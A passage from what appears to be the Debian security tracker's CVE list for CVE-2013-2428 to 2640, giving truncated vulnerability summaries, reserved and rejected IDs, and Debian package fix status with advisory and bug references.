vulnerability in CTERA Cloud Storage OS bef ...) NOT-FOR-US: CTERA Cloud Storage OS CVE-2013-2638 RESERVED CVE-2013-2637 (A Cross-Site Scripting (XSS) Vulnerability exists in OTRS ITSM prior t ...) NOT-FOR-US: OTRS ITSM and OTRS FAQ CVE-2013-2636 (net/bridge/br_mdb.c in the Linux kernel before 3.8.4 does not initiali ...) - linux (Introduced in 3.8) - linux-2.6 (Introduced in 3.8) CVE-2013-2635 (The rtnl_fill_ifinfo function in net/core/rtnetlink.c in the Linux ker ...) - linux 3.2.41-2 - linux-2.6 [squeeze] - linux-2.6 (Introduced in 2.6.34) CVE-2013-2634 (net/dcb/dcbnl.c in the Linux kernel before 3.8.4 does not initialize c ...) {DSA-2668-1} - linux 3.2.41-2 - linux-2.6 CVE-2013-2633 (Piwik before 1.11 accepts input from a POST request instead of a GET r ...) - piwik (bug #506933) CVE-2013-2632 (Google V8 before 3.17.13, as used in Google Chrome before 27.0.1444.3, ...) - libv8 [squeeze] - libv8 (Unsupported in squeeze-lts) [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) - libv8-3.14 (unimportant; bug #773671) NOTE: libv8 not covered by security support CVE-2013-2631 (TinyWebGallery (TWG) 1.8.9 and earlier contains a full path disclosure ...) NOT-FOR-US: TinyWebGallery CVE-2013-2630 (Cross-site scripting (XSS) vulnerability in CA Service Desk Manager 12 ...) NOT-FOR-US: CA Service Desk Manager CVE-2013-2629 (Leed (Light Feed), possibly before 1.5 Stable, allows remote attackers ...) NOT-FOR-US: Leed CVE-2013-2628 (Multiple cross-site request forgery (CSRF) vulnerabilities in action.p ...) NOT-FOR-US: Leed CVE-2013-2627 (SQL injection vulnerability in action.php in Leed (Light Feed), possib ...) NOT-FOR-US: Leed CVE-2013-2626 RESERVED CVE-2013-2625 (An Access Bypass issue exists in OTRS Help Desk before 3.2.4, 3.1.14, ...) - otrs2 3.1.7+dfsg1-8 [squeeze] - otrs2 2.4.9+dfsg1-3+squeeze4 NOTE: DSA-2733-1 NOTE: http://web.archive.org/web/20130716120019/http://www.otrs.com:80/en/open-source/community-news/security-advisories/security-advisory-2013-01/ CVE-2013-2624 (Telean before 1.3.1 contains a full path disclosure vulnerability whic ...) NOT-FOR-US: Telean CVE-2013-2623 (Cross-site Scripting (XSS) in Telaen before 1.3.1 allows remote attack ...) NOT-FOR-US: Uebimiau Webmail CVE-2013-2622 (Cross-site Scripting (XSS) in UebiMiau 2.7.11 and earlier allows remot ...) NOT-FOR-US: Uebimiau Webmail CVE-2013-2621 (Open Redirection Vulnerability in the redir.php script in Telaen befor ...) NOT-FOR-US: Uebimiau Webmail CVE-2013-2620 RESERVED CVE-2013-2619 (Directory traversal vulnerability in Aspen before 0.22 allows remote a ...) NOT-FOR-US: Aspen CVE-2013-2618 (Cross-site scripting (XSS) vulnerability in editor.php in Network Weat ...) NOT-FOR-US: Network Weathermap CVE-2013-2617 (lib/curl.rb in the Curl Gem for Ruby allows remote attackers to execut ...) NOT-FOR-US: Ruby Curl gem CVE-2013-2616 (lib/mini_magick.rb in the MiniMagick Gem 1.3.1 for Ruby allows remote ...) NOT-FOR-US: Ruby MiniMagick gem CVE-2013-2615 (lib/entry_controller.rb in the fastreader Gem 1.0.8 for Ruby allows re ...) NOT-FOR-US: Ruby fastreader gem CVE-2013-2614 RESERVED CVE-2013-2613 RESERVED CVE-2013-2612 (Command-injection vulnerability in Huawei E587 3G Mobile Hotspot 11.20 ...) NOT-FOR-US: Huawei CVE-2013-2611 RESERVED CVE-2013-2610 RESERVED CVE-2013-2609 RESERVED CVE-2013-2608 RESERVED CVE-2013-2607 RESERVED CVE-2013-2606 RESERVED CVE-2013-2605 RESERVED CVE-2013-2604 (RealNetworks GameHouse RealArcade Installer (aka ActiveMARK Game Insta ...) NOT-FOR-US: RealNetworks GameHouse RealArcade Installer CVE-2013-2603 (The RACInstaller.StateCtrl.1 ActiveX control in InstallerDlg.dll in Re ...) NOT-FOR-US: RealNetworks GameHouse RealArcade Installer CVE-2013-2602 (Multiple array index errors in the MyHeritage SEQueryObject ActiveX co ...) NOT-FOR-US: MyHeritage SEQueryObject ActiveX control CVE-2013-2601 (The NDVM in Citrix XenClient XT before 2.1.3 and 3.x before 3.1.4 allo ...) NOT-FOR-US: Citrix XenClient XT CVE-2013-2600 (MiniUPnPd has information disclosure use of snprintf() ...) - miniupnpd 1.8.20130730-1 (bug #716936) CVE-2013-2599 (A certain Qualcomm Innovation Center (QuIC) patch to the NativeDaemonC ...) NOT-FOR-US: Qualcomm (Android) CVE-2013-2598 (app/aboot/aboot.c in the Little Kernel (LK) bootloader, as distributed ...) NOT-FOR-US: Little Kernel (bootloader) CVE-2013-2597 (Stack-based buffer overflow in the acdb_ioctl function in audio_acdb.c ...) NOT-FOR-US: Android Linux kernel (affects {sound/soc/,arch/arm/mach-}msm/qdsp6v2) NOTE: https://www.codeaurora.org/projects/security-advisories/stack-based-buffer-overflow-acdb-audio-driver-cve-2013-2597 CVE-2013-2596 (Integer overflow in the fb_mmap function in drivers/video/fbmem.c in t ...) - linux 3.9-1 [wheezy] - linux 3.2.46-1 NOTE: the issue comes from fbmem code from linux mainline, the exploit was just targetting motorola NOTE: phones that ship code that is based on the original linux code, but both are affected. NOTE: an exploit needs access to /dev/fb0 which is not world readable/writable on Debian CVE-2013-2595 (The device-initialization functionality in the MSM camera driver for t ...) NOT-FOR-US: Qualcomm MSM Camera driver CVE-2013-2594 (SQL injection vulnerability in reports/calldiary.php in Hornbill Suppo ...) NOT-FOR-US: Supportworks ITSM CVE-2013-2593 RESERVED CVE-2013-2592 RESERVED CVE-2013-2591 RESERVED CVE-2013-2590 RESERVED CVE-2013-2589 RESERVED CVE-2013-2588 RESERVED CVE-2013-2587 RESERVED CVE-2013-2586 (XAMPP 1.8.1 does not properly restrict access to xampp/lang.php, which ...) NOT-FOR-US: XAMPPP CVE-2013-2585 (Cross-site scripting (XSS) vulnerability in Atmail Webmail Server 6.6. ...) - atmailopen CVE-2013-2584 RESERVED CVE-2013-2583 (Multiple cross-site scripting (XSS) vulnerabilities in Open-Xchange Ap ...) NOT-FOR-US: Open-Xchange CVE-2013-2582 (CRLF injection vulnerability in the redirect servlet in Open-Xchange A ...) NOT-FOR-US: Open-Xchange CVE-2013-2581 (cgi-bin/firmwareupgrade in TP-Link IP Cameras TL-SC3130, TL-SC3130G, T ...) NOT-FOR-US: TP-Link IP Cameras CVE-2013-2580 (Unrestricted file upload vulnerability in cgi-bin/uploadfile in TP-Lin ...) NOT-FOR-US: TP-Link IP Cameras CVE-2013-2579 (TP-Link IP Cameras TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G, and p ...) NOT-FOR-US: TP-Link IP Cameras CVE-2013-2578 (cgi-bin/admin/servetest in TP-Link IP Cameras TL-SC3130, TL-SC3130G, T ...) NOT-FOR-US: TP-Link IP Cameras CVE-2013-2577 (Buffer overflow in XnView before 2.04 allows remote attackers to execu ...) NOT-FOR-US: XnView CVE-2013-2576 (Buffer overflow in Artweaver before 3.1.6 allows remote attackers to c ...) NOT-FOR-US: Artweaver CVE-2013-2575 RESERVED CVE-2013-2574 (An Access vulnerability exists in FOSCAM IP Camera FI8620 due to insuf ...) NOT-FOR-US: Foscam CVE-2013-2573 (A Command Injection vulnerability exists in the ap parameter to the /c ...) NOT-FOR-US: TP-Link CVE-2013-2572 (A Security Bypass vulnerability exists in TP-LINK IP Cameras TL-SC 313 ...) NOT-FOR-US: TP-Link CVE-2013-2571 (Iris 3.8 before build 1548, as used in Xpient point of sale (POS) syst ...) NOT-FOR-US: Xpient point of sale (POS) CVE-2013-2570 (A Command Injection vulnerability exists in Zavio IP Cameras through 1 ...) NOT-FOR-US: Zavio CVE-2013-2569 (A Security Bypass vulnerability exists in Zavio IP Cameras through 1.6 ...) NOT-FOR-US: Zavio CVE-2013-2568 (A Command Injection vulnerability exists in Zavio IP Cameras through 1 ...) NOT-FOR-US: Zavio CVE-2013-2567 (An Authentication Bypass vulnerability exists in the web interface in ...) NOT-FOR-US: Zavio CVE-2013-2566 (The RC4 algorithm, as used in the TLS protocol and SSL protocol, has m ...) NOTE: Generic protocol flaw in RC4 CVE-2013-2565 (A vulnerability in Mambo CMS v4.6.5 where the scripts thumbs.php, edit ...) NOT-FOR-US: Mambo CMS CVE-2013-2564 (Mambo CMS 4.6.5 allows remote attackers to cause a denial of service ( ...) NOT-FOR-US: Mambo CMS CVE-2013-2563 (Mambo CMS 4.6.5 uses world-readable permissions on configuration.php, ...) NOT-FOR-US: Mambo CMS CVE-2013-2562 (Mambo CMS 4.6.5 stores the MySQL database password in cleartext in the ...) NOT-FOR-US: Mambo CMS CVE-2013-2561 (OpenFabrics ibutils 1.5.7 allows local users to overwrite arbitrary fi ...) - ibutils 1.5.7-2 (low; bug #704063) [squeeze] - ibutils (Minor issue) [wheezy] - ibutils (Minor issue) CVE-2013-2560 (Directory traversal vulnerability in the web interface on Foscam devic ...) NOT-FOR-US: Foscam CVE-2013-2559 (SQL injection vulnerability in Symphony CMS before 2.3.2 allows remote ...) NOT-FOR-US: Symphony CMS CVE-2013-2558 (Unspecified vulnerability in Microsoft Windows 8 allows remote attacke ...) NOT-FOR-US: Windows 8 CVE-2013-2557 (The sandbox protection mechanism in Microsoft Internet Explorer 9 allo ...) NOT-FOR-US: Internet Explorer CVE-2013-2556 (Unspecified vulnerability in Microsoft Windows Vista SP2, Windows Serv ...) NOT-FOR-US: Windows 7 CVE-2013-2555 (Integer overflow in Adobe Flash Player before 10.3.183.75 and 11.x bef ...) NOT-FOR-US: Adobe Flash plugin CVE-2013-2554 (Unspecified vulnerability in Microsoft Windows 7 allows attackers to b ...) NOT-FOR-US: Windows 7 CVE-2013-2553 (Unspecified vulnerability in the kernel in Microsoft Windows 7 allows ...) NOT-FOR-US: Windows 7 CVE-2013-2552 (Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows ...) NOT-FOR-US: Internet Explorer CVE-2013-2551 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Internet Explorer CVE-2013-2550 (Unspecified vulnerability in Adobe Reader 11.0.02 allows attackers to ...) NOT-FOR-US: Adobe Reader CVE-2013-2549 (Unspecified vulnerability in Adobe Reader 11.0.02 allows remote attack ...) NOT-FOR-US: Adobe Reader CVE-2013-2548 (The crypto_report_one function in crypto/crypto_user.c in the report A ...) - linux 3.2.41-1 (low) - linux-2.6 (Introduced in 3.2) CVE-2013-2547 (The crypto_report_one function in crypto/crypto_user.c in the report A ...) - linux 3.2.41-1 (low) - linux-2.6 (Introduced in 3.2) CVE-2013-2546 (The report API in the crypto user configuration API in the Linux kerne ...) - linux 3.2.41-1 (low) - linux-2.6 (Introduced in 3.2) CVE-2013-2545 RESERVED CVE-2013-2544 RESERVED CVE-2013-2543 RESERVED CVE-2013-2542 RESERVED CVE-2013-2541 RESERVED CVE-2013-2540 RESERVED CVE-2013-2539 RESERVED CVE-2013-2538 RESERVED CVE-2013-2537 RESERVED CVE-2013-2536 RESERVED CVE-2013-2535 RESERVED CVE-2013-2534 RESERVED CVE-2013-2533 RESERVED CVE-2013-2532 RESERVED CVE-2013-2531 RESERVED CVE-2013-2530 RESERVED CVE-2013-2529 RESERVED CVE-2013-2528 RESERVED CVE-2013-2527 RESERVED CVE-2013-2526 RESERVED CVE-2013-2525 RESERVED CVE-2013-2524 RESERVED CVE-2013-2523 RESERVED CVE-2013-2522 RESERVED CVE-2013-2521 RESERVED CVE-2013-2520 RESERVED CVE-2013-2519 RESERVED CVE-2013-2518 REJECTED CVE-2013-2517 REJECTED CVE-2013-2516 (Vulnerability in FileUtils v0.7, Ruby Gem Fileutils <= v0.7 Command ...) - ruby-fileutils (bug #900515) CVE-2013-2515 RESERVED CVE-2013-2514 RESERVED CVE-2013-2513 RESERVED CVE-2013-2512 (The ftpd gem 0.2.1 for Ruby allows remote attackers to execute arbitra ...) NOT-FOR-US: Ruby ftpd gem CVE-2013-2511 RESERVED CVE-2013-2510 RESERVED CVE-2013-2509 RESERVED CVE-2013-2508 RESERVED CVE-2013-2507 (Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC ...) NOT-FOR-US: Brother CVE-2013-2506 (app/models/spree/user.rb in spree_auth_devise in Spree 1.1.x before 1. ...) NOT-FOR-US: Spree CVE-2013-2505 RESERVED CVE-2013-2504 (Cross-site scripting (XSS) vulnerability in SPS/Portal/default.aspx in ...) NOT-FOR-US: Matrix42 Service Store CVE-2013-2503 (Privoxy before 3.0.21 does not properly handle Proxy-Authenticate and ...) - privoxy 3.0.21-1 (low; bug #702896) [wheezy] - privoxy (Minor issue) [squeeze] - privoxy (Minor issue) NOTE: http://blog.c22.cc/2013/03/11/privoxy-proxy-authentication-credential-exposure-cve-2013-2503/ NOTE: http://ijbswa.cvs.sourceforge.net/viewvc/ijbswa/current/ChangeLog?revision=1.188&view=markup CVE-2013-2502 RESERVED CVE-2013-2501 (Cross-site scripting (XSS) vulnerability in the Terillion Reviews plug ...) NOT-FOR-US: Terillion Reviews plugin for Wordpress CVE-2013-2500 RESERVED CVE-2013-2499 (SimpleHRM 2.3 and earlier could allow remote attackers to bypass the a ...) NOT-FOR-US: SimpleHRM CVE-2013-2498 (SQL injection vulnerability in the login page in flexycms/modules/user ...) NOT-FOR-US: SimpleHRM CVE-2013-2497 RESERVED CVE-2013-2496 (The msrle_decode_8_16_24_32 function in msrledec.c in libavcodec in FF ...) - libav 6:0.8.6-1 (bug #703200) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) CVE-2013-2495 (The iff_read_header function in iff.c in libavformat in FFmpeg through ...) - libav 6:0.8.6-1 (bug #703200) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) CVE-2013-2494 (libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to ...) - isc-dhcp 4.2.4-6 (low; bug #704426) [wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u6 [squeeze] - isc-dhcp (Only affects 4.2.x) CVE-2013-2493 (The Hook_Terminate function in chrome_frame/protocol_sink_wrap.cc in t ...) NOT-FOR-US: Google Chrome Frame plugin for Internet Explorer CVE-2013-2492 (Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 185 ...) {DSA-2648-1 DSA-2647-1} - firebird2.1 (bug #702735) - firebird2.5 2.5.2~svn+54698.ds4-2 (bug #702736) NOTE: http://tracker.firebirdsql.org/browse/CORE-4058 CVE-2013-2491 RESERVED CVE-2013-2490 RESERVED CVE-2013-2489 RESERVED CVE-2013-2488 (The DTLS dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before 1 ...) {DSA-2644-1} - wireshark 1.8.2-5 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-22.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8380 NOTE: Versions affected: 1.8.0 to 1.8.X, 1.6.0 to 1.6.X CVE-2013-2487 (epan/dissectors/packet-reload.c in the REsource LOcation And Discovery ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) [squeeze] - wireshark (only 1.8.x series) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-21.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8364 NOTE: Versions affected: 1.8.0 to 1.8.5 NOTE: Not suitable for code injection CVE-2013-2486 (The dissect_diagnosticrequest function in epan/dissectors/packet-reloa ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) [squeeze] - wireshark (only 1.8.x series) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-21.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8364 NOTE: Versions affected: 1.8.0 to 1.8.5 NOTE: Not suitable for code injection CVE-2013-2485 (The FCSP dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before 1 ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-20.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8359 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 NOTE: Not suitable for code injection CVE-2013-2484 (The CIMD dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before 1 ...) {DSA-2644-1} - wireshark 1.8.2-5 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-19.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8346 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 CVE-2013-2483 (The acn_add_dmp_data function in epan/dissectors/packet-acn.c in the A ...) {DSA-2644-1} - wireshark 1.8.2-5 (unimportant) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-18.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8340 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 NOTE: Not suitable for code injection CVE-2013-2482 (The AMPQ dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before 1 ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-17.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8337 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 NOTE: Not suitable for code injection CVE-2013-2481 (Integer signedness error in the dissect_mount_dirpath_call function in ...) {DSA-2644-1} - wireshark 1.8.2-5 (unimportant) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-16.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8335 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 NOTE: Not suitable for code injection CVE-2013-2480 (The RTPS and RTPS2 dissectors in Wireshark 1.6.x before 1.6.14 and 1.8 ...) {DSA-2644-1} - wireshark 1.8.2-5 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-15.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8332 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 CVE-2013-2479 (The dissect_mpls_echo_tlv_dd_map function in epan/dissectors/packet-mp ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) [squeeze] - wireshark (only affecting 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-14.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8039 NOTE: Versions affected: 1.8.0 to 1.8.5 NOTE: Not suitable for code injection CVE-2013-2478 (The dissect_server_info function in epan/dissectors/packet-ms-mms.c in ...) {DSA-2644-1} - wireshark 1.8.2-5 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-13.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8382 NOTE: announce mentions: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 CVE-2013-2477 (The CSN.1 dissector in Wireshark 1.8.x before 1.8.6 does not properly ...) - wireshark 1.8.2-5 [squeeze] - wireshark (only affecting 1.8.x) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-12.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8383 NOTE: Versions affected: 1.8.0 to 1.8.5 CVE-2013-2476 (The dissect_hartip function in epan/dissectors/packet-hartip.c in the ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) [squeeze] - wireshark (only affecting 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-11.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8360 NOTE: Versions affected: 1.8.0 to 1.8.5 NOTE: Not suitable for code injection CVE-2013-2475 (The TCP dissector in Wireshark 1.8.x before 1.8.6 allows remote attack ...) - wireshark 1.8.2-5 [squeeze] - wireshark (only affecting 1.8.x) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-10.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8274 NOTE: Versions affected: 1.8.0 to 1.8.5 CVE-2013-2474 (Directory traversal vulnerability in AWS XMS 2.5 allows remote attacke ...) NOT-FOR-US: AWS XMS CVE-2013-2473 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2472 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2471 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2470 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2469 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2468 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2467 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java 5) - openjdk-7 (Only affects Java 5) CVE-2013-2466 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2465 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2464 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-2463 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2462 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java 7) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2461 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2460 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2722-1} - openjdk-6 (Only affects Java 7) - openjdk-7 7u25-2.3.10-1 CVE-2013-2459 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2458 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2722-1} - openjdk-6 (Only affects Java 7) - openjdk-7 7u25-2.3.10-1 CVE-2013-2457 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 (Only applies to Java 7) - openjdk-7 7u25-2.3.10-1 CVE-2013-2456 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2455 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2454 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2722-1} - openjdk-6 (Only affects Java 7) - openjdk-7 7u25-2.3.10-1 CVE-2013-2453 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-7 7u25-2.3.10-1 - openjdk-6 6b27-1.12.6-1 CVE-2013-2452 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2451 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2450 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2449 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2722-1} - openjdk-6 (Only affects Java 7) - openjdk-7 7u25-2.3.10-1 CVE-2013-2448 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2447 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2446 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2445 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2444 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2443 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-7 7u25-2.3.10-1 - openjdk-6 6b27-1.12.6-1 CVE-2013-2442 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2441 (Unspecified vulnerability in the Agile EDM component in Oracle Supply ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-2440 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2439 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Installation performed differently for Linux distros) - openjdk-7 (Installation performed differently for Linux distros) CVE-2013-2438 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-2437 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2436 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only affects Java7) CVE-2013-2435 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2434 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java 7) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-2433 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2432 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-2431 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only affects Java7) CVE-2013-2430 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2429 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2428 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 